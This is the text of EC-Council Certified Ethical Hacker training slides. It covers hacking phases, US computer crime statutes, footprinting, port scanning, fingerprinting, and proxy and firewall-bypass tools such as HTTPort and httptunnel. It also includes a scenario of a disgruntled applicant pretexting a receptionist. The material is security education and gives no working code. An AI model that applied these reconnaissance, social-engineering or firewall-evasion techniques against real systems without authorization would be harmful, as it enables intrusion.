SlideShare a Scribd company logo
Ethical Hacking
Introduction
EC-Council
Introductions
~ Name
~ Company Affiliation
~ Title / Function
~ Job Responsibility
~ System security related experience
~Expectations
EC-Council
Course Materials
~ Identity Card
~ Student Courseware
~ Lab Manual / Workbook
~ Compact Disc
~ Course Evaluation
~ Reference Materials
EC-Council
Course Outline
~ Module I : Introduction to Ethical Hacking
~ Module II: Footprinting
~ Module III: Scanning
~ Module IV: Enumeration
~ Module V: System Hacking
EC-Council
Course Outline (contd..)
~ Module VI: Trojans and Backdoors
~ Module VII: Sniffers
~ Module VIII: Denial of Service
~ Module IX: Social Engineering
~ Module X: Session Hijacking
EC-Council
Course Outline (contd..)
~ Module XI: Hacking Web Servers
~ Module XII: Web Application Vulnerabilities
~ Module XIII: Web Based Password Cracking
Techniques
~ Module XIV: SQL Injection
~ Module XV: Hacking Wireless Networks
EC-Council
Course Outline (contd..)
~ Module XVI: Viruses
~ Module XVII: Novell Hacking
~ Module XVIII: Linux Hacking
~ Module XIX: Evading IDS, Firewalls and Honey pots
~ Module XX: Buffer Overflows
~ Module XXI: Cryptography
EC-Council
EC-Council Certified e- business
Certification Program
There are five e-Business certification tracks
under EC-Council Accreditation body:
• 1. Certified e-Business Associate
• 2. Certified e-Business Professional
• 3. Certified e-Business Consultant
• 4. E++ Certified Technical Consultant
• 5. Certified Ethical Hacker
EC-Council
EC-Council Certified Ethical Hacker
EC-Council
Student Facilities
Building Hours Phones
Parking Messages
Restrooms Smoking
Recycling
Meals
Class Hours
EC-Council
Lab Sessions
~ Lab Sessions are designed
to reinforce the classroom
sessions
~ The sessions are intended
to give a hands on
experience only and does
not guarantee proficiency.
Ethical Hacking
Module I
Introduction to Ethical
Hacking
EC-Council
Module Objective
~ Understanding the importance of security
~ Introducing ethical hacking and essential
terminology for the module
~ Understanding the different phases involved in
an exploit by a hacker
~ Overview of attacks and identification of exploit
categories
~ Comprehending ethical hacking
~ Legal implications of hacking
~ Hacking, law and punishment
EC-Council
Problem Definition – Why Security?
~ Evolution of technology focused on ease of use
~ Increasing complexity of computer
infrastructure administration and management
~ Decreasing skill level needed for exploits
~ Direct impact of security breach on corporate
asset base and goodwill
~ Increased networked environment and network
based applications
EC-Council
Can Hacking Be Ethical?
~ The noun ‘hacker’ refers to a person who enjoys learning
the details of computer systems and stretch their
capabilities.
~ The verb ‘hacking’ describes the rapid development of
new programs or the reverse engineering of already
existing software to make the code better, and efficient.
~ The term ‘cracker’ refers to a person who uses his hacking
skills for offensive purposes.
~ The term ‘ethical hacker’ refers to security professionals
who apply their hacking skills for defensive purposes.
EC-Council
Essential Terminology
~ Threat – An action or event that might prejudice
security. A threat is a potential violation of security.
~ Vulnerability – Existence of a weakness, design, or
implementation error that can lead to an unexpected,
undesirable event compromising the security of the
system.
~ Target of Evaluation – An IT system, product, or
component that is identified/subjected as requiring
security evaluation.
~ Attack – An assault on system security that derives
from an intelligent threat. An attack is any action that
violates security.
~ Exploit – A defined way to breach the security of an IT
system through vulnerability.
EC-Council
Elements of Security
~ Security is a state of well-being of information and
infrastructures in which the possibility of successful yet
undetected theft, tampering, and disruption of
information and services is kept low or tolerable
~ Any hacking event will affect any one or more of the
essential security elements.
~ Security rests on confidentiality, authenticity, integrity,
and availability
• Confidentiality is the concealment of information or resources.
• Authenticity is the identification and assurance of the origin of
information.
• Integrity refers to the trustworthiness of data or resources in
terms of preventing improper and unauthorized changes.
• Availability refers to the ability to use the information or
resource desired
EC-Council
What Does a Malicious Hacker Do?
~Reconnaissance
• Active / passive
~Scanning
~Gaining access
• Operating system level /
application level
• Network level
• Denial of service
~Maintaining access
• Uploading / altering /
downloading programs or
data
~Covering tracks
Clearing
Tracks
Maintaining
Access
Gaining
Access
Scanning
Reconnaissance
EC-Council
Phase 1 - Reconnaissance
~ Reconnaissance refers to the preparatory phase where
an attacker seeks to gather as much information as
possible about a target of evaluation prior to launching
an attack. It involves network scanning either external
or internal without authorization
~ Business Risk – ‘Notable’ – Generally noted as a
"rattling the door knobs" to see if someone is watching
and responding. Could be future point of return when
noted for ease of entry for an attack when more is
known on a broad scale about the target.
EC-Council
Phase 1 - Reconnaissance (contd.)
~ Passive reconnaissance involves monitoring
network data for patterns and clues.
• Examples include sniffing, information gathering
etc.
~ Active reconnaissance involves probing the
network to detect
• accessible hosts
• open ports
• location of routers
• details of operating systems and services
EC-Council
Phase 2 - Scanning
~ Scanning refers to pre-attack phase when the hacker
scans the network with specific information gathered
during reconnaissance.
~ Business Risk – ‘High’ – Hackers have to get a single
point of entry to launch an attack and could be point of
exploit when vulnerability of the system is detected.
~ Scanning can include use of dialers, port scanners,
network mapping, sweeping, vulnerability scanners etc.
EC-Council
Phase 3 - Gaining Access
~ Gaining Access refers to the true attack phase. The
hacker exploits the system.
~ The exploit can occur over a LAN, locally, Internet,
offline, as a deception or theft. Examples include stack-
based buffer overflows, denial of service, session
hijacking, password filtering etc.
~ Influencing factors include architecture and
configuration of target system, skill level of the
perpetrator and initial level of access obtained.
~ Business Risk – ‘Highest’ - The hacker can gain access
at operating system level, application level or network
level.
EC-Council
Phase 4 - Maintaining Access
~ Maintaining Access refers to the phase when the hacker
tries to retain his ‘ownership’ of the system.
~ The hacker has exploited a vulnerability and can tamper
and compromise the system.
~ Sometimes, hackers harden the system from other
hackers as well (to own the system) by securing their
exclusive access with Backdoors, RootKits, Trojans and
Trojan horse Backdoors.
~ Hackers can upload, download or manipulate data /
applications / configurations on the ‘owned’ system.
EC-Council
Phase 5 - Covering Tracks
~ Covering Tracks refers to the activities undertaken by
the hacker to extend his misuse of the system without
being detected.
~ Reasons include need for prolonged stay, continued use
of resources, removing evidence of hacking, avoiding
legal action etc.
~ Examples include Steganography, tunneling, altering
log files etc.
~ Hackers can remain undetected for long periods or use
this phase to start a fresh reconnaissance to a related
target system.
EC-Council
Hacker Classes
~Black hats
• Individuals with
extraordinary computing
skills, resorting to malicious
or destructive activities.
Also known as ‘Crackers.’
~White Hats
• Individuals professing
hacker skills and using
them for defensive
purposes. Also known as
‘Security Analysts’.
~Gray Hats
• Individuals who work both
offensively and defensively
at various times.
~Ethical Hacker Classes
• Former Black Hats
– Reformed crackers
– First-hand experience
– Lesser credibility perceived
• White Hats
– Independent security
consultants (maybe groups
as well)
– Claims to be knowledgeable
about black hat activities
• Consulting Firms
– Part of ICT firms
– Good credentials
EC-Council
Hacktivism
~ Refers to ‘hacking with / for a cause’.
~ Comprises of hackers with a social or political agenda
~ Aims at sending across a message through their hacking
activity and gaining visibility for their cause and
themselves.
~ Common targets include government agencies, MNCs,
or any other entity perceived as ‘bad’ or ‘wrong’ by these
groups / individuals.
~ It remains a fact however, that gaining unauthorized
access is a crime, no matter what the intent.
EC-Council
What do Ethical Hackers do?
~ “If you know the enemy and know yourself, you need
not fear the result of a hundred battles.”
– – Sun Tzu, Art of War
~ Ethical hackers tries to answer:
• What can the intruder see on the target system?
(Reconnaissance and Scanning phase of hacking)
• What can an intruder do with that information? (Gaining
Access and Maintaining Access phases)
• Does anyone at the target notice the intruders attempts or
success? (Reconnaissance and Covering Tracks phases)
~ If hired by any organization, an ethical hacker asks the
organization what it is trying to protect, against whom
and what resources it is willing to expend in order to
gain protection.
EC-Council
Skill Profile of an Ethical Hacker
~ Computer expert adept at
technical domains.
~ In-depth knowledge about
target platforms (such as
windows, Unix, Linux).
~ Exemplary knowledge in
networking and related
hardware / software.
~ Knowledgeable about
security areas and related
issues – though not
necessarily a security
professional.
EC-Council
How do they go about it?
~ Any security evaluation involves three components:
~ Preparation – In this phase, a formal contract is signed
that contains a non-disclosure clause as well as a legal
clause to protect the ethical hacker against any
prosecution that he may attract during the conduct
phase. The contract also outlines infrastructure
perimeter, evaluation activities, time schedules and
resources available to him.
~ Conduct – In this phase, the evaluation technical report
is prepared based on testing potential vulnerabilities.
~ Conclusion – In this phase, the results of the evaluation
is communicated to the organization / sponsors and
corrective advise / action is taken if needed.
EC-Council
Modes of Ethical Hacking
~ Remote network – This mode attempts to simulate an
intruder launch an attack over the Internet.
~ Remote dial-up network - This mode attempts to
simulate an intruder launching an attack against the
client’s modem pools.
~ Local network – This mode simulates an employee with
legal access gaining unauthorized access over the local
network.
~ Stolen equipment – This mode simulates theft of a
critical information resource such as a laptop owned by
a strategist, (taken by the client unaware of its owner
and given to the ethical hacker).
~ Social engineering – This aspect attempts to check the
integrity of the organization’s employees.
~ Physical entry – This mode attempts to physically
compromise the organization’s ICT infrastructure.
EC-Council
Security Testing
~ There are many different forms of security testing.
Examples include vulnerability scanning, ethical
hacking and penetration testing. Security testing can be
conducted using one of two approaches:
~ Black-box (with no prior knowledge of the
infrastructure to be tested)
~ White-box (with a complete knowledge of the network
infrastructure).
~ Internal Testing is also known as Gray-box testing and
this examines the extent of access by insiders within the
network.
EC-Council
Deliverables
~ Ethical Hacking Report
~ Details the results of the hacking activity, matching it
against the work schedule decided prior to the conduct
phase.
~ Vulnerabilities are detailed and avoidance measures
suggested. Usually delivered in hard copy format for
security reasons.
~ Issues to consider – Nondisclosure clause in the legal
contract - availing the right information to the right
person), integrity of the evaluation team, sensitivity of
information.
EC-Council
Computer Crimes and Implications
~ Cyber Security Enhancement Act 2002 – implicates life
sentences for hackers who ‘recklessly’ endanger the
lives of others.
~ The CSI/FBI 2002 Computer Crime and Security
Survey noted that 90% of the respondents
acknowledged security breaches, but only 34% reported
the crime to law enforcement agencies.
~ The FBI computer crimes squad estimates that between
85 to 97 percent of computer intrusions are not even
detected.
~ Stigma associated with reporting security lapses
EC-Council
Legal Perspective (US Federal Law)
Federal Criminal Code Related to Computer Crime:
~ 18 U.S.C. § 1029. Fraud and Related Activity in Connection
with Access Devices
~ 18 U.S.C. § 1030. Fraud and Related Activity in Connection
with Computers
~ 18 U.S.C. § 1362. Communication Lines, Stations, or
Systems
~ 18 U.S.C. § 2510 et seq. Wire and Electronic
Communications Interception and Interception of Oral
Communications
~ 18 U.S.C. § 2701 et seq. Stored Wire and Electronic
Communications and Transactional Records Access
EC-Council
Section 1029
Subsection (a) Whoever -
(1) knowingly and with intent to defraud produces, uses,
or traffics in one or more counterfeit access devices;
(2) knowingly and with intent to defraud traffics in or uses
one or more unauthorized access devices during any
one-year period, and by such conduct obtains anything
of value aggregating $1,000 or more during that period;
(3) knowingly and with intent to defraud possesses fifteen
or more devices which are counterfeit or unauthorized
access devices;
(4) knowingly, and with intent to defraud, produces,
traffics in, has control or custody of, or possesses
device-making equipment;
EC-Council
Section 1029 (contd.)
(5) knowingly and with intent to defraud effects
transactions, with 1 or more access devices issued to
another person or persons, to receive payment or any
other thing of value during any 1-year period the
aggregate value of which is equal to or greater than
$1,000;
(6) without the authorization of the issuer of the access
device, knowingly and with intent to defraud solicits a
person for the purpose of—
(A) offering an access device; or
(B) selling information regarding or an application to obtain an
access device;
(7) knowingly and with intent to defraud uses, produces,
traffics in, has control or custody of, or possesses a
telecommunications instrument that has been modified
or altered to obtain unauthorized use of
telecommunications services;
EC-Council
Section 1029 (contd.)
(8) knowingly and with intent to defraud uses, produces, traffics in,
has control or custody of, or possesses a scanning receiver;
(9) knowingly uses, produces, traffics in, has control or custody of, or
possesses hardware or software, knowing it has been configured to
insert or modify telecommunication identifying information
associated with or contained in a telecommunications instrument
so that such instrument may be used to obtain telecommunications
service without authorization; or
(10) without the authorization of the credit card system member or its
agent, knowingly and with intent to defraud causes or arranges for
another person to present to the member or its agent, for payment,
1 or more evidences or records of transactions made by an access
device.
EC-Council
Penalties
(A) in the case of an offense that does not occur after a
conviction for another offense under this section--
• (i) if the offense is under paragraph (1), (2), (3), (6), (7), or (10) of
subsection (a), a fine under this title or imprisonment for not
more than 10 years, or both; and
• (ii) if the offense is under paragraph (4), (5), (8), or (9) of
subsection (a), a fine under this title or imprisonment for not
more than 15 years, or both;
(B) in the case of an offense that occurs after a conviction
for another offense under this section, a fine under this
title or imprisonment for not more than 20 years, or
both; and
(C) in either case, forfeiture to the United States of any
personal property used or intended to be used to commit
the offense.
EC-Council
Section 1030 – (a) (1)
Subsection (a) Whoever--
(1) having knowingly accessed a computer without authorization or
exceeding authorized access, and by means of such conduct having
obtained information that has been determined by the United States
Government pursuant to an Executive order or statute to require
protection against unauthorized disclosure for reasons of national
defense or foreign relations, or any restricted data, as defined in
paragraph y of section 11 of the Atomic Energy Act of 1954, with
reason to believe that such information so obtained could be used to
the injury of the United States, or to the advantage of any foreign
nation willfully communicates, delivers, transmits, or causes to be
communicated, delivered, or transmitted, or attempts to
communicate, deliver, transmit or cause to be communicated,
delivered, or transmitted the same to any person not entitled to
receive it, or willfully retains the same and fails to deliver it to the
officer or employee of the United States entitled to receive it;
EC-Council
Section 1030 (2) (A) (B) (C)
(2) intentionally accesses a computer without
authorization or exceeds authorized access, and thereby
obtains--
(A) information contained in a financial record of a financial
institution, or of a card issuer as defined in section 1602(n) of
title 15, or contained in a file of a consumer reporting agency on
a consumer, as such terms are defined in the Fair Credit
Reporting Act (15 U.S.C. 1681 et seq.);
(B) information from any department or agency of the United
States; or
(C) information from any protected computer if the conduct
involved an interstate or foreign communication;
EC-Council
Section 1030 (3) (4)
(3) intentionally, without authorization to access any
nonpublic computer of a department or agency of the
United States, accesses such a computer of that
department or agency that is exclusively for the use of
the Government of the United States or, in the case of a
computer not exclusively for such use, is used by or for
the Government of the United States and such conduct
affects that use by or for the Government of the United
States;
(4) knowingly and with intent to defraud, accesses a
protected computer without authorization, or exceeds
authorized access, and by means of such conduct
furthers the intended fraud and obtains anything of
value, unless the object of the fraud and the thing
obtained consists only of the use of the computer and
the value of such use is not more than $5,000 in any 1-
year period;
EC-Council
Section 1030 (5) (A) (B)
(5)(A)(i) knowingly causes the transmission of a
program, information, code, or command, and
as a result of such conduct, intentionally causes
damage without authorization, to a protected
computer;
(ii) intentionally accesses a protected computer
without authorization, and as a result of such
conduct, recklessly causes damage; or
(iii) intentionally accesses a protected computer
without authorization, and as a result of such
conduct, causes damage; and
(5)(B) by conduct described in clause (i), (ii), or
(iii) of subparagraph (A), caused (or, in the case
of an attempted offense, would, if completed,
have caused)--
EC-Council
Section 1030 (5) (B) (contd.)
(i) loss to 1 or more persons during any 1-year period (and,
for purposes of an investigation, prosecution, or other
proceeding brought by the United States only, loss
resulting from a related course of conduct affecting 1 or
more other protected computers) aggregating at least
$5,000 in value;
(ii) the modification or impairment, or potential
modification or impairment, of the medical
examination, diagnosis, treatment, or care of 1 or more
individuals;
(iii) physical injury to any person;
(iv) a threat to public health or safety; or
(v) damage affecting a computer system used by or for a
government entity in furtherance of the administration
of justice, national defense, or national security;
EC-Council
Section 1030 (6) (7)
(6) knowingly and with intent to defraud traffics
(as defined in section 1029) in any password or
similar information through which a computer
may be accessed without authorization, if--
(A) such trafficking affects interstate or foreign
commerce; or
(B) such computer is used by or for the Government of
the United States;
(7) with intent to extort from any person any
money or other thing of value, transmits in
interstate or foreign commerce any
communication containing any threat to cause
damage to a protected computer;
EC-Council
Penalties
(1)(A) a fine under this title or imprisonment for not more
than ten years, or both, in the case of an offense under
subsection (a)(1) of this section which does not occur
after a conviction for another offense under this section,
or an attempt to commit an offense punishable under
this subparagraph; and
(B) a fine under this title or imprisonment for not more than
twenty years, or both, in the case of an offense under
subsection (a)(1) of this section which occurs after a conviction
for another offense under this section, or an attempt to commit
an offense punishable under this subparagraph;
(2)(A) except as provided in subparagraph (B), a fine
under this title or imprisonment for not more than one
year, or both, in the case of an offense under subsection
(a)(2), (a)(3), (a)(5)(A)(iii), or (a)(6) of this section
which does not occur after a conviction for another
offense under this section, or an attempt to commit an
offense punishable under this subparagraph;
EC-Council
Penalties (contd.)
~ (B) a fine under this title or imprisonment for not more
than 5 years, or both, in the case of an offense under
subsection (a)(2), or an attempt to commit an offense
punishable under this subparagraph, if--
• (i) the offense was committed for purposes of commercial
advantage or private financial gain;
• (ii) the offense was committed in furtherance of any criminal or
tortuous act in violation of the Constitution or laws of the
United States or of any State; or
• (iii) the value of the information obtained exceeds $5,000;
~ (C) a fine under this title or imprisonment for not more
than ten years, or both, in the case of an offense under
subsection (a)(2), (a)(3) or (a)(6) of this section which
occurs after a conviction for another offense under this
section, or an attempt to commit an offense punishable
under this subparagraph;
EC-Council
Penalties (contd.)
(3)(A) a fine under this title or imprisonment for not more
than five years, or both, in the case of an offense under
subsection (a)(4) or (a)(7) of this section which does not
occur after a conviction for another offense under this
section, or an attempt to commit an offense punishable
under this subparagraph; and
(3)(B) a fine under this title or imprisonment for not more
than ten years, or both, in the case of an offense under
subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section
which occurs after a conviction for another offense
under this section, or an attempt to commit an offense
punishable under this subparagraph; and
EC-Council
Penalties (contd.)
(4)(A) a fine under this title, imprisonment for not more
than 10 years, or both, in the case of an offense under
subsection (a)(5)(A)(i), or an attempt to commit an
offense punishable under that subsection;
(4)(B) a fine under this title, imprisonment for not more
than 5 years, or both, in the case of an offense under
subsection (a)(5)(A)(ii), or an attempt to commit an
offense punishable under that subsection;
(4)(C) a fine under this title, imprisonment for not more
than 20 years, or both, in the case of an offense under
subsection (a)(5)(A)(i) or (a)(5)(A)(ii), or an attempt to
commit an offense punishable under either subsection,
that occurs after a conviction for another offense under
this section.
EC-Council
Summary
~ Security is critical across sectors and industries.
~ Ethical Hacking is a methodology to simulate a
malicious attack without causing damage.
~ Hacking involves five distinct phases.
~ Security evaluation includes preparation, conduct and
evaluation phases.
~ Cyber crime can be differentiated into two categories.
~ U.S. Statutes ξ 1029 and 1030 primarily address cyber
crime.
Ethical Hacking
Module II
Footprinting
EC-Council
Scenario
Adam is furious. He had applied for the network
engineer job at targetcompany.com He believes
that he was rejected unfairly. He has a good track
record, but the economic slowdown has seen many
layoffs including his. He is frustrated – he needs a
job and feels he has been wronged. Late in the
evening he decides that he will prove his mettle.
~ What do you think Adam would do?
~ Where would he start and how would he go about it?
~ Are there any tools that can help him in his effort?
~Can he cause harm to targetcompany.com?
~ As a security professional, where can you lay checkpoints and how
can you deploy countermeasures?
EC-Council
Module Objectives
~ Overview of the Reconnaissance Phase
~ Introducing Footprinting
~ Understanding the information gathering
methodology of hackers
~ Comprehending the Implications
~ Learning some of the tools used for
reconnaissance phase
~ Deploying countermeasures
EC-Council
Revisiting Reconnaissance
Clearing
Tracks
Maintaining
Access
Gaining
Access
Scanning
Reconnaissance
Clearing
Tracks
Maintaining
Access
Gaining
Access
Scanning
Reconnaissance
~ Reconnaissance refers to
the preparatory phase
where an attacker seeks
to gather as much
information as possible
about a target of
evaluation prior to
launching an attack.
~ It involves network
scanning either external
or internal without
authorization.
EC-Council
Defining Footprinting
~ Footprinting is the blueprinting of the security
profile of an organization, undertaken in a
methodological manner.
~ Footprinting is one of the three pre-attack
phases. The others are scanning and
enumeration.
~ Footprinting results in a unique organization
profile with respect to networks (Internet /
Intranet / Extranet / Wireless) and systems
involved.
EC-Council
Information Gathering Methodology
~ Unearth initial information
~ Locate the network range
~ Ascertain active machines
~ Discover open ports / access points
~ Detect operating systems
~ Uncover services on ports
~ Map the Network
EC-Council
Unearthing Initial Information
~Commonly includes:
~Domain name lookup
~Locations
~Contacts (Telephone /
mail)
~Information Sources:
~Open source
~Whois
~Nslookup
~Hacking Tool:
~Sam Spade
EC-Council
Whois
Registrant:
targetcompany (targetcompany-DOM)
# Street Address
City, Province
State, Pin, Country
Domain Name: targetcompany.COM
Domain servers in listed order:
NS1.WEBHOST.COM XXX.XXX.XXX.XXX
NS2.WEBHOST.COM XXX.XXX.XXX.XXX
Administrative Contact:
Surname, Name (SNIDNo-ORG) targetcompany@domain.com
targetcompany (targetcompany-DOM) # Street Address
City, Province, State, Pin, Country
Telephone: XXXXX Fax XXXXX
Technical Contact:
Surname, Name (SNIDNo-ORG) targetcompany@domain.com
targetcompany (targetcompany-DOM) # Street Address
City, Province, State, Pin, Country
Telephone: XXXXX Fax XXXXX
EC-Council
Nslookup
~ Nslookup is a program to query Internet
domain name servers. Displays information
that can be used to diagnose Domain Name
System (DNS) infrastructure.
~ Helps find additional IP addresses if
authoritative DNS is known from whois.
~ MX record reveals the IP of the mail server.
~ Both Unix and Windows come with a Nslookup
client.
~ Third party clients are also available – E.g. Sam
Spade
EC-Council
Scenario (contd.)
Adam knows that targetcompany is based at NJ.
However, he decides to check it up. He runs a
whois from an online whois client and notes the
domain information. He takes down the email ids
and phone numbers. He also discerns the domain
server IPs and does an interactive Nslookup.
~ Ideally. what extent of information should be revealed to Adam
during this quest?
~ Are there any other means of gaining information? Can he use the
information at hand in order to obtain critical information?
~What are the implications for the target company? Can he cause
harm to targetcompany at this stage?
EC-Council
Locate the Network Range
~Commonly includes:
~Finding the range of IP
addresses
~Discerning the subnet mask
~Information Sources:
~ARIN (American Registry of
Internet Numbers)
~Traceroute
~Hacking Tool:
~NeoTrace
~Visual Route
EC-Council
ARIN
~ ARIN allows search on
the whois database to
locate information on
networks autonomous
system numbers (ASNs),
network-related handles
and other related point
of contact (POC).
~ ARIN whois allows
querying the IP address
to help find information
on the strategy used for
subnet addressing.
EC-Council
Screenshot: ARIN Whois Output
EC-Council
Traceroute
~ Traceroute works by exploiting a feature of the Internet
Protocol called TTL, or Time To Live.
~ Traceroute reveals the path IP packets travel between
two systems by sending out consecutive UDP packets
with ever-increasing TTLs .
~ As each router processes a IP packet, it decrements the
TTL. When the TTL reaches zero, it sends back a "TTL
exceeded" message (using ICMP) to the originator.
~ Routers with DNS entries reveal the name of routers,
network affiliation and geographic location.
EC-Council
Tool: NeoTrace (Now McAfee Visual Trace)
NeoTrace shows the
traceroute output
visually – map view,
node view and IP view
EC-Council
Tool: VisualRoute Trace
EC-Council
Tool: SmartWhois
SmartWhois is a useful network
information utility that allows you to find
out all available information about an IP
address, host name, or domain, including
country, state or province, city, name of
the network provider, administrator and
technical support contact information
Unlike standard Whois
utilities, SmartWhois can
find the information about a
computer located in any part
of the world, intelligently
querying the right database
and delivering all the related
records within a few seconds.
EC-Council
Scenario (contd.)
Adam makes a few searches and gets some
internal contact information. He calls the
receptionist and informs her that the HR had
asked him to get in touch with a specific IT division
personnel. It’s lunch hour, and he says he’ d rather
mail to the person concerned than disturb him. He
checks up the mail id on newsgroups and stumbles
on an IP recording. He traces the IP destination.
~ What preventive measures can you suggest to check the
availability of sensitive information?
~ What are the implications for the target company? Can
he cause harm to targetcompany at this stage?
~ What do you think he can do with the information he
has obtained?
EC-Council
Tool: VisualLookout
VisualLookout provides high level
views as well as detailed and
historical views that provide traffic
information in real-time or on a
historical basis.
In addition the user can request a
"connections" window for any
server, which provides a real-time
view of all the active network
connections showing
~who is connected,
~what service is being used,
~whether the connection is
inbound or outbound, and
~how many connections are
active and how long they have
been connected.
EC-Council
Tool: VisualRoute Mail Tracker
EC-Council
Screenshot: VisualRoute Mail Tracker
EC-Council
Tool: eMailTrackerPro
eMailTrackerPro is the e-mail
analysis tool that enables analysis
of an e-mail and its headers
automatically and provides
graphical results
EC-Council
Tool: Mail Tracking (mailtracking.com)
Mail Tracking is a
tracking service that
allows the user to track
when his mail was
read, for how long and
how many times. It
also records forwards
and passing of
sensitive information
(MS Office format)
EC-Council
Summary
~ Information gathering phase can be categorized broadly
into seven phases.
~ Footprinting renders a unique security profile of a
target system.
~ Whois, ARIN can reveal public information of a domain
that can be leveraged further.
~ Traceroute and mail tracking can be used to target
specific IP and later for IP spoofing.
~ Nslookup can reveal specific users and zone transfers
can compromise DNS security.
Ethical Hacking
Module III
Scanning
EC-Council
EC-Council
Scenario
~ Where do you think Tim should begin with his security initiative?
~ What would the first signs that his systems are under attack?
Tim had got the much needed break he was looking
for. He was going to be assisting the systems
administrator of his division in securing their
information systems. It was a dream come true for
him as he was always interested in incident
response.
Tim began by browsing through the system architecture. Yes,
they had the usual systems – firewall, mail server, NIDS and a
couple of servers that were always up for remote users. At first
sight, traffic seemed normal and there was nothing amiss.
Anyway, he decided that he would just monitor the systems in his
neighborhood for any abnormal activity.
EC-Council
Module Objective
~ Detecting ‘live’ systems on target network.
~ Discovering services running/ listening on
target systems.
~ Understanding port scanning techniques.
~ Identifying TCP and UDP services running on
target network.
~ Discovering the operating system
~ Understanding active and passive
fingerprinting.
~ Automated discovery tools.
EC-Council
Detecting ‘Live’ Systems On Target
Network
Why?
~ To determine the perimeter of the target
network /system
~ To facilitate network mapping
~ To build an inventory of accessible systems on
target network
Tools
~ War Dialers
~ Ping Utilities
EC-Council
War Dialers
~ A war dialer is a tool used to scan a large pool of
telephone numbers to detect vulnerable modems to
provide access to the system.
~ A demon dialer is a tool used to monitor a specific
phone number and target its modem to gain access to
the system.
~ Threat is high in systems with poorly configured remote
access products providing entry to larger networks.
~ Tools include THC-Scan, ToneLoc, TBA etc.
EC-Council
War Dialer
Hacker
Dial-in
PSTN
Internet
Outside
Router
Inside
Router
Firewall
Dial-in
Modem
Server
EC-Council
Tool: THC Scan
EC-Council
Ping
~ Ping send out an ICMP Echo Request packet and awaits
an ICMP Echo Reply message from an active machine.
~ Alternatively, TCP/UDP packets are sent if incoming
ICMP messages are blocked.
~ Ping helps in assessing network traffic by time stamping
each packet.
~ Ping can also be used for resolving host names.
~ Tools include Pinger, WS_Ping ProPack, NetScan
Tools, HPing, icmpenum
EC-Council
Tool: Pinger
EC-Council
Detecting Ping Sweeps
Ping sweeps form a basic step in network mapping by
polling network blocks and/or IP address ranges.
Ping Utilities include:
• WS_PingProPack (www.ipswitch.com)
• NetScan Tools (www.nwpsw.com)
• Hping (http://www.hping.org/download.html)
• icmpenum (www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz)
Ping Sweep Detection Utilities include:
• Network based IDS (www.snort.org)
• Genius (www.indiesoft.com)
• BlackICE (www.networkice.com)
• Scanlogd (www.openwall.com/scanlogd)
EC-Council
Discovering services running/
listening on target systems.
Why?
~ To determine live hosts in the event of ICMP requests
being blocked by host.
~ To identify potential ports for furthering the attack.
~ To understand specific applications / versions of a
service.
~ To discover operating system details.
Tools
~ Port Scanners
EC-Council
TCP three-way handshake
1. SYN sent from Client
2. SYN/ACK sent from Server
3. ACK sent from Client
EC-Council
Understanding Port Scanning
Techniques
~Port Scanning is one of the most popular
reconnaissance techniques used by hackers to discover
services that can be compromised.
~A potential target computer runs many 'services' that
listen at ‘well-known’ 'ports'.
~By scanning which ports are available on the victim, the
hacker finds potential vulnerabilities that can be exploited.
~Scan techniques can be differentiated broadly into
Vanilla, Strobe, Stealth, FTP Bounce, Fragmented
Packets, Sweep and UDP Scans.
EC-Council
Port Scanning Techniques
Port Scanning
Techniques can be
broadly classified into:
~ Open scan
~ Half- open scan
~ Stealth scan
~ Sweeps
~ Misc
EC-Council
Tool: ipEye, IPSecScan
EC-Council
Tool: NetScan Tools Pro 2003
EC-Council
Tool: SuperScan
EC-Council
Tool: NMap (Network Mapper)
EC-Council
Active Stack Fingerprinting
~ Fingerprinting is done to determine the remote OS
~ Allows attacker to leave smaller footprint and have
greater chance to succeed
~ Based on the fact that various OS vendors implement
the TCP stack differently
~ Specially crafted packets sent to remote OS and
response is noted. This is compared with a database to
determine the OS
EC-Council
Passive Fingerprinting
~ Passive fingerprinting is also based on the differential
implantation of the stack and the various ways an OS
responds to it.
~ However, instead of relying on scanning the target host,
passive fingerprinting captures packets from the target
host and study it for tell tale signs that can reveal the
OS.
~ Passive fingerprinting is less accurate than active
fingerprinting.
EC-Council
Cheops
EC-Council
SocksChain
~ SocksChain is a program
that allows to work
through a chain of
SOCKS or HTTP proxies
to conceal the actual IP-
address.
~ SocksChain can function
as a usual SOCKS-server
that transmits queries
through a chain of
proxies.
EC-Council
Proxy Servers
~ Proxy is a network computer that can serve as an
intermediate for connection with other computers. They
are usually used for the following purposes:
• As firewall, a proxy protects the local network from outside access.
• As IP-addresses multiplexer, a proxy allows to connect a number
of computers to Internet when having only one IP-address
• Proxy servers can be used (to some extent) to anonymize web
surfing.
• Specialized proxy servers can filter out unwanted content, such as
ads or 'unsuitable' material.
• Proxy servers can afford some protection against hacking attacks.
EC-Council
Anonymizers
~ Anonymizers are services that help make your own web
surfing anonymous.
~ The first anonymizer developed was Anonymizer.com,
created in 1997 by Lance Cottrell.
~ An anonymizer removes all the identifying information
from a user’s computers while the user surfs the
Internet, thereby ensuring the privacy of the user.
EC-Council
Bypassing Firewall using Httptunnel
http://www.nocrew.org/software/httptunnel.html
~Httptunnel creates a bidirectional virtual data path tunneled
in HTTP requests. The requests can be sent via an HTTP proxy
if so desired.
EC-Council
HTTPort
HTTPort allows you to bypass an HTTP proxy, which is
blocking you from the Internet. With HTTPort you may
use the following software (just a sample list, not
limited to !) from behind an HTTP proxy: e-mail, IRC,
ICQ, news, FTP, AIM, any SOCKS capable software, etc.
etc.
EC-Council
Summary
~ War dialing is the term given to accessing a network
illegally over a compromised phone line. Popular tools
include THC war dialer and phone sweep.
~ Scanning is a method adopted by administrators and
crackers alike to discover more about a network
~ There are various scan types - SYN, FIN, Connect, ACK,
RPC, Inverse Mapping, FTP Bounce, Idle Host etc. The
use of a particular scan type depends on the objective at
hand.
~ Ways to subvert a standard connection include
HTTPort, HTTP tunneling, using proxies, SOCKS
chains and anonymizers.
Ethical Hacking
Module IV
Enumeration
EC-Council
Module Objective
~ Understanding Windows 2000 enumeration
~ How to Connect via Null Session
~ How to disguise NetBIOS Enumeration
~ Disguise using SNMP enumeration
~ How to steal Windows 2000 DNS information
using zone transfers
~ Learn to enumerate users via CIFS/SMB
~ Active Directory enumerations
EC-Council
What is Enumeration
~ If acquisition and non intrusive probing have not
turned up any results, then an attacker will next turn to
identifying valid user accounts or poorly protected
resource shares.
~ Enumeration involves active connections to systems
and directed queries.
~ The type of information enumerated by intruders:
• Network resources and shares
• Users and groups
• Applications and banners
EC-Council
